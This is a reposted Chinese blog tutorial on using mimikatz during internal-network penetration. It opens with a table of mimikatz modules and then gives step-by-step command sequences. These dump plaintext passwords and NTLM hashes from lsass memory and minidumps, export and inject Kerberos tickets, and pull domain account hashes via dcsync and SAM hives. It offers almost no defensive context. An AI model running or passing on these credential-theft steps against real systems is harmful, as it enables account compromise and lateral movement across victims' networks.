安全-内网渗透中mimikatz使用方法
Posted 小狐狸FM
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全-内网渗透中mimikatz使用方法相关的知识,希望对你有一定的参考价值。
前言
此文章为转载,略加修改并非原创
一、简介
Mimikatz
是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从lsass.exe
进程中获取当前登录系统用户名的密码,
lsass
是微软Windows
系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在lsass
内存中
经过其
wdigest
和tspkg
两个模块调用后,对其使用可逆算法进行加密并存储在内存之中, 而mimikatz
正是通过对lsass
逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!
二、命令
命令 | 介绍 |
---|---|
acr | ACR模块 |
busylight | BusyLight Module |
cls | 清屏 |
crypto | 加密相关模块 |
dpapi | DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口] |
exit | 退出 |
event | 事件模块 |
iis | IIS XML配置模块 |
lsadump | LsaDump模块 |
nogpo::cmd | 打开系统的cmd.exe |
nogpo::regedit | 打开系统的注册表 |
nogpo::taskmgr | 打开任务管理器 |
misc | 杂项模块 |
minesweeper | Mine Sweeper模块 |
sekurlsa | 与证书相关的模块 |
standard | 标准模块,基本命令 |
kerberos | kerberos模块 |
privilege | 提权相关模块 |
privilege::debug | 提升权限 |
privilege::enable | 激活一个或多个权限,提升权限 |
privilege::list | 列出权限列表 |
process | 进程相关模块 |
process::list | 列出进程 |
process::modules | 列出系统的核心模块及所在位置 |
process::stop 进程名称 | 结束进程 |
process::suspend进程名称 | 暂停进程 |
rdm | RDM(830AL)器件的射频模块 |
rpc | mimikatz的RPC控制 |
serivce | 服务相关模块 |
service::list | 列出系统的服务 |
service::remove | 移除系统的服务 |
service::start 服务名称 | 启动服务 |
service::stop 服务名称 | 停止服务 |
sid | 安全标识符模块 |
sr98 | 用于SR98设备和T5577目标的RF模块 |
sysenv | 系统环境值模块 |
system::computer | 查看计算机名称 |
system::user | 查看当前登录的系统用户 |
sekurlsa::logonPasswords | 获登陆用户信息及密码 |
sekurlsa::tspkg | 获取tspkg用户信息及密码 |
system::user | 查看当前登录的系统用户 |
sekurlsa::wdigest | 获取本地用户信息及密码 |
token | 令牌操作模块 |
ts | 终端服务器模块 |
ts::processes | 显示进程和对应的pid情况等 |
ts::sessions | 显示当前的会话 |
vault | Windows 、证书模块 |
version | 查看版本 |
三、准备
mimikatz # log
mimikatz # privilege::debug //提升权限(不是administrator,debug会失败)
四、抓取明文密码
mimikatz #log
mimikatz #privilege::debug
mimikatz #sekurlsa::logonpasswords
但是在安装了KB2871997补丁或者系统版本大于windows server 2012时,系统的内存中就不再保存明文的密码,这样利用
mimikatz
就不能从内存中读出明文密码了。mimikatz
的使用需要administrator
用户执行,administrators
中的其他用户都不行,所以我们这里用administrator
权限启动mimikatz
。
msv:是账户对于的密码的各种加密协议的密文,这里有LM、NTLM和SHA1加密的密文
tspkg,wdigest,kerberos:是账户的明文密码了。(这里显示为null,是应为版本大于2012)
SSP:是最新登陆到其他RDP终端的账户和密码
五、模块使用
[1].sekurlsa模块
sekurlsa::logonpasswords //获取登录用户信息及密码
抓取用户NTLM哈希
sekurlsa::msv
加载dmp文件,并导出其中的明文密码
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full
导出lsass.exe进程中所有的票据
sekurlsa::tickets /export
[2].kerberos模块
列出系统中的票据
kerberos::list
kerberos::tgt
清除系统中的票据
kerberos::purge
导入票据到系统中
kerberos::ptc 票据路径
[3].lsadump模块
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等
lsadump::dcsync /domain:kevin.com /user:root
(在域控上执行)读取所有域用户的哈希
lsadump::lsa /patch
从sam.hive和system.hive文件中获得NTLM Hash
lsadump::sam /sam:sam.hive /system:system.hive
从本地SAM文件中读取密码哈希
token::elevate
lsadump::sam
以上是关于安全-内网渗透中mimikatz使用方法的主要内容,如果未能解决你的问题,请参考以下文章